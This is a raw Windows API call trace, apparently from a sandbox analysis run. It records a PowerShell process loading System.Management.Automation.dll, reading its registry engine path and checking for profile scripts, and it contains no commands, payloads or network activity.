	[0547.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ebf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0547.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ebe50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0547.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ebe50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0547.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ebf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0547.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ebe50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0547.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ebe50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0547.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ebf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0547.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ebe50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0547.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ebe50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0547.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ebf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0547.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ebe50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0547.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ebe50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0547.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ebf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0547.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ebe50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0547.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ebe50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0547.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ebf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0547.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ebe50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0547.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ebe50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0547.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ebf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0547.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ebe50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0547.532] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ebe50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0547.532] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ebf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0547.532] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ebe50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0547.532] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ebe50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0547.532] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ebf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0547.533] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ebe50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0547.533] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ebe50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0547.533] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ebf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0547.533] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ebe50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0547.533] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ebe50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0548.420] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ebe90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0548.420] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ebde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0548.420] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ebde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0548.421] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ebe90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0548.421] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ebde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0548.421] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ebde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0548.421] VirtualQuery (in: lpAddress=0x1eb510, lpBuffer=0x1ec3d0, dwLength=0x30 | out: lpBuffer=0x1ec3d0*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0548.426] CoTaskMemAlloc (cb=0x104) returned 0x1b6e49c0
	[0548.426] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e49c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0548.426] CoTaskMemFree (pv=0x1b6e49c0) 
	[0548.435] CoTaskMemAlloc (cb=0x104) returned 0x1b6e49c0
	[0548.436] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e49c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0548.436] CoTaskMemFree (pv=0x1b6e49c0) 
	[0548.436] CoTaskMemAlloc (cb=0x104) returned 0x1b6e49c0
	[0548.436] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e49c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0548.436] CoTaskMemFree (pv=0x1b6e49c0) 
	[0548.437] CoTaskMemAlloc (cb=0x104) returned 0x1b6e49c0
	[0548.437] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e49c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0548.437] CoTaskMemFree (pv=0x1b6e49c0) 
	[0548.442] CoTaskMemAlloc (cb=0x104) returned 0x1b6e49c0
	[0548.442] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e49c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0548.442] CoTaskMemFree (pv=0x1b6e49c0) 
	[0548.448] CoTaskMemAlloc (cb=0x104) returned 0x1b6e49c0
	[0548.448] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e49c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0548.448] CoTaskMemFree (pv=0x1b6e49c0) 
	[0548.450] CoTaskMemAlloc (cb=0x104) returned 0x1b6e49c0
	[0548.450] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e49c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0548.450] CoTaskMemFree (pv=0x1b6e49c0) 
	[0549.499] VirtualQuery (in: lpAddress=0x1eb510, lpBuffer=0x1ec3d0, dwLength=0x30 | out: lpBuffer=0x1ec3d0*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0553.101] VirtualQuery (in: lpAddress=0x1eb510, lpBuffer=0x1ec3d0, dwLength=0x30 | out: lpBuffer=0x1ec3d0*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0553.109] CoTaskMemAlloc (cb=0x104) returned 0x1b6e49c0
	[0553.109] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e49c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0553.109] CoTaskMemFree (pv=0x1b6e49c0) 
	[0559.190] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x1b6e4ad0
	[0559.194] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x1b6e4be0
	[0566.556] CoTaskMemAlloc (cb=0x104) returned 0x1b6e4cf0
	[0566.556] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e4cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0566.556] CoTaskMemFree (pv=0x1b6e4cf0) 
	[0567.861] CoTaskMemAlloc (cb=0x104) returned 0x1b6e4cf0
	[0567.861] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e4cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0567.861] CoTaskMemFree (pv=0x1b6e4cf0) 
	[0567.861] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0567.862] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0567.862] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0567.862] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0569.415] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0569.415] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0569.415] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0569.415] VirtualQuery (in: lpAddress=0x1eb7c0, lpBuffer=0x1ec680, dwLength=0x30 | out: lpBuffer=0x1ec680*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0569.422] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed618 | out: phkResult=0x1ed618*=0x314) returned 0x0
	[0569.422] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed59c, lpData=0x0, lpcbData=0x1ed598*=0x0 | out: lpType=0x1ed59c*=0x1, lpData=0x0, lpcbData=0x1ed598*=0x56) returned 0x0
	[0569.422] CoTaskMemAlloc (cb=0x5a) returned 0x1b70cd40
	[0569.422] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed56c, lpData=0x1b70cd40, lpcbData=0x1ed568*=0x56 | out: lpType=0x1ed56c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ed568*=0x56) returned 0x0
	[0569.423] CoTaskMemFree (pv=0x1b70cd40) 
	[0569.423] RegCloseKey (hKey=0x314) returned 0x0
	[0569.423] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed618 | out: phkResult=0x1ed618*=0x314) returned 0x0
	[0569.423] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed59c, lpData=0x0, lpcbData=0x1ed598*=0x0 | out: lpType=0x1ed59c*=0x1, lpData=0x0, lpcbData=0x1ed598*=0x56) returned 0x0
	[0569.423] CoTaskMemAlloc (cb=0x5a) returned 0x1b70cd40
	[0569.423] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed56c, lpData=0x1b70cd40, lpcbData=0x1ed568*=0x56 | out: lpType=0x1ed56c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ed568*=0x56) returned 0x0
	[0569.423] CoTaskMemFree (pv=0x1b70cd40) 
	[0569.423] RegCloseKey (hKey=0x314) returned 0x0
	[0569.424] CoTaskMemAlloc (cb=0x20c) returned 0x1b6e0970
	[0569.424] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b6e0970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0569.424] CoTaskMemFree (pv=0x1b6e0970) 
	[0569.424] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x1ed1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0569.424] CoTaskMemAlloc (cb=0x20c) returned 0x1b6e0970
	[0569.424] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b6e0970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0569.424] CoTaskMemFree (pv=0x1b6e0970) 
	[0569.424] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x1ed1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0569.425] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x1ed370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0569.425] SetErrorMode (uMode=0x1) returned 0x1
	[0569.425] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1ed580 | out: lpFileInformation=0x1ed580*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0569.426] SetErrorMode (uMode=0x1) returned 0x1
	[0569.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x1ed370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0569.426] SetErrorMode (uMode=0x1) returned 0x1
	[0569.426] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1ed580 | out: lpFileInformation=0x1ed580*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0569.426] SetErrorMode (uMode=0x1) returned 0x1
	[0569.426] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x1ed370, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0569.426] SetErrorMode (uMode=0x1) returned 0x1
